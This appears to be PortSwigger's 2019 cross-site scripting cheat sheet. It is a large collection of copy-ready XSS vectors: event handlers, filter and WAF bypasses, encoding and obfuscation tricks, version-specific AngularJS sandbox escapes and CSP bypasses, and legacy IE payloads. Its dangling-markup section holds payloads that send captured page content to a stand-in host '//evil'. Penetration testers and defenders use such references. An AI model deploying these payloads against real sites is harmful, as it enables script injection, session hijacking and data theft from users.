Cross-site scripting (XSS) cheat sheet
This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2019. Last updated: Fri, 08 Nov 2019 10:58:07 +0000.
Event handlers
Event handlers that do not require user interaction
Event:
Description:
Tag:
Code:
Copy:
onactivate
onafterprint
onanimationcancel
Fires when a CSS animation cancels
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a>
Compatibility:
onanimationend
Fires when a CSS animation ends
<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>
Compatibility:
onanimationiteration
Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a>
Compatibility:
onanimationstart
Fires when a CSS animation starts
<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a>
Compatibility:
onbeforeactivate
Fires before the element is activated
<a id=x tabindex=1 onbeforeactivate=alert(1)></a>
Compatibility:
onbeforedeactivate
Fires before the element is deactivated
<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>
Compatibility:
onbeforeprint
onbeforeunload
Fires after if the url changes
<body onbeforeunload="location='javascript:alert(1)'">
Compatibility:
onbegin
Fires when a svg animation begins
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
Compatibility:
onblur
Fires when an element loses focus
<a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
Compatibility:
onbounce
Fires when the marquee bounces
<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
Compatibility:
oncanplay
Fires if the resource can be played
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
Compatibility:
ondeactivate
Fires when the element is deactivated
<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>
Compatibility:
onend
onended
Fires when the resource is finished playing
<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onerror
Fires when the resource fails to load or causes an error
<audio src/onerror=alert(1)>
Compatibility:
onfinish
Fires when the marquee finishes
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
Compatibility:
onfocus
onfocusin
onfocusout
Fires when an element loses focus
<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
Compatibility:
onhashchange
onload
onloadeddata
Fires when the first frame is loaded
<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onloadedmetadata
Fires when the meta data is loaded
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onloadend
Fires when the element finishes loading
<image src=validimage.png onloadend=alert(1)>
Compatibility:
onloadstart
Fires when the element begins to load
<image src=validimage.png onloadstart=alert(1)>
Compatibility:
onmessage
Fires when message event is received from a postMessage call
<body onmessage=alert(1)>
Compatibility:
onpageshow
onplay
Fires when the resource is played
<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onplaying
Fires the resource is playing
<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onpopstate
onreadystatechange
onrepeat
Fires when a svg animation repeats
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
Compatibility:
onresize
onscroll
Fires when the page scrolls
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
Compatibility:
onstart
ontimeupdate
Fires when the timeline is changed
<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
ontoggle
Fires when the details tag is expanded
<details ontoggle=alert(1) open>test</details>
Compatibility:
ontransitioncancel
Fires when a CSS transition cancels
<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a>
Compatibility:
ontransitionend
Fires when a CSS transition ends
<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a>
Compatibility:
ontransitionrun
Fires when a CSS transition begins
<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a>
Compatibility:
onunhandledrejection
Fires when a promise isn't handled
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
Compatibility:
onwaiting
Fires when while waiting for the data
<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
Compatibility:
Event handlers that do require user interaction
Event:
Description:
Tag:
Code:
Copy:
onauxclick
Fires when right clicking or using the middle button of the mouse
<input onauxclick=alert(1)>
Compatibility:
onbeforecopy
Requires you copy a piece of text
<a onbeforecopy="alert(1)" contenteditable>test</a>
Compatibility:
onbeforecut
onbeforepaste
Requires you paste a piece of text
<a onbeforepaste="alert(1)" contenteditable>test</a>
Compatibility:
onchange
onclick
oncontextmenu
Triggered when right clicking to show the context menu
<a oncontextmenu="alert(1)">test</a>
Compatibility:
oncopy
oncut
ondblclick
ondrag
ondragend
Triggered dragging is finished on the element
<a draggable="true" ondragend="alert(1)">test</a>
Compatibility:
ondragenter
ondragleave
ondragover
Triggered dragging over an element
<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>
Compatibility:
ondragstart
ondrop
Triggered dropping a draggable element
<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>
Compatibility:
oninput
oninvalid
Requires a form submission with an element that does not satisfy its constraints such as a required attribute.
<form><input oninvalid=alert(1) required><input type=submit>
Compatibility:
onkeydown
onkeypress
onkeyup
onmousedown
onmouseenter
Triggered when the mouse is hovered over the element
<a onmouseenter="alert(1)">test</a>
Compatibility:
onmouseleave
Triggered when the mouse is moved away from the element
<a onmouseleave="alert(1)">test</a>
Compatibility:
onmousemove
onmouseout
Triggered when the mouse is moved away from the element
<a onmouseout="alert(1)">test</a>
Compatibility:
onmouseover
onmouseup
onpaste
onpause
Requires clicking the element to pause
<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onreset
onsearch
Fires when a form is submitted and the input has a type attribute of search
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
Compatibility:
onseeked
Requires clicking the element timeline
<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onseeking
Requires clicking the element timeline
<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onselect
onsubmit
onunload
Requires a click anywhere on the page and a reload
<svg onunload=window.open('javascript:alert(1)')>
Compatibility:
onvolumechange
Requires volume adjustment
<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
onwheel
Restricted characters
No parentheses using exception handling no semi colons using expressions
<script>throw onerror=alert,1</script>
No parentheses using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses using exception handling and eval on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval without .
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
Frameworks
Protocols
Characters \x09,\x0a,\x0d are allowed after protocol name before the colon
<a href="javascript
:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG script href attribute without closing script tag
<svg><script href="data:text/javascript,alert(1)" />
SVG use element Chrome/Firefox
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Base tag with JavaScript protocol rewriting relative URLS
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Other useful attributes
Click a submit element from anywhere on the page, even outside the form
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements: Access key attributes can enable XSS on normally unexploitable elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage
<a href=# download="filename.html">Test</a>
Disable referrer using referrerpolicy
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Special tags
Meta charset UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 1
+/v8
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 2
+/v9
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 3
+/v+
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 4
+/v/
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Encoding
Octal encoding
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon
<a href="javascript:alert(1)">XSS</a><a href="javascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>alert(1)</script></svg>
<svg><script>alert(1)</script></svg>
<svg><script>alert
(1)</script></svg>
<svg><script>x="",alert(1)//";</script></svg>
Hex encoding without semi-colon provided next character is not a-f0-9
<a href="javascript:alert(1)">XSS</a>
<a href="j
avascript:alert(1)">XSS</a>
<a href="j avascript:alert(1)">XSS</a>
Obfuscation
Firefox allows NULL characters inside opening comments
<!-�- ><img title="--><iframe/onload=alert(1)>"> -->
<!-�����- ><img title="--><iframe/onload=alert(1)>"> -->
Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Client-side template injection
AngularJS sandbox escapes reflected
Version:
Author:
Length:
Vector:
Copy:
1.0.1 - 1.1.5 (shorter)
Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)
33
{{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1
Jan Horn (Google)
122
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.6 - 1.2.18
Jan Horn (Google)
106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23
Mathias Karlsson (Detectify)
124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.3.0
Gábor Molnár (Google)
272
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
)));}}
1.3.3 - 1.3.18
Gareth Heyes (PortSwigger)
128
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19
Gareth Heyes (PortSwigger)
102
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20
Gareth Heyes (PortSwigger)
65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9
Gareth Heyes (PortSwigger)
74
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8
Ian Hickey & Gareth Heyes (PortSwigger)
79
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11
Jan Horn (Google)
517
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
>=1.6.0 (shorter)
Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)
33
{{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes
(Using orderBy or no $eval)
Version:
Author:
Length:
Vector:
Copy:
1.2.0 - 1.2.18
Jan Horn (Google)
118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23
Mathias Karlsson (Detectify)
119
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26
Gareth Heyes (PortSwigger)
317
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.4.0-1.4.5
Gareth Heyes (PortSwigger)
75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
1.4.4 (without strings)
Gareth Heyes (PortSwigger)
134
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version:
Author:
Length:
Vector:
Copy:
All versions (Chrome)
Gareth Heyes (PortSwigger)
81
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome) shorter
Gareth Heyes (PortSwigger)
56
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers) shorter
Gareth Heyes (PortSwigger)
91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
Scriptless attacks
Dangling markup
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil target='
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Polyglots
Classic vectors (XSS crypt)
Iframe data urls no longer work as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript
<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encoded allows encoded VBScript
<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style="color=red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script>
function window.onload(){
alert(1);
}
</script>
<script>
function window::onload(){
alert(1);
}
</script>
<script>
function window.location(){
}
</script>
<body>
<script>
function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}
</script>
</body>
<body>
<script>
function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }
</script>
</body>
GreyMagic HTML+time exploit (no longer works even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Credits
Brought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist
You can contribute to this cheat sheet by updating the JSON and creating a pull request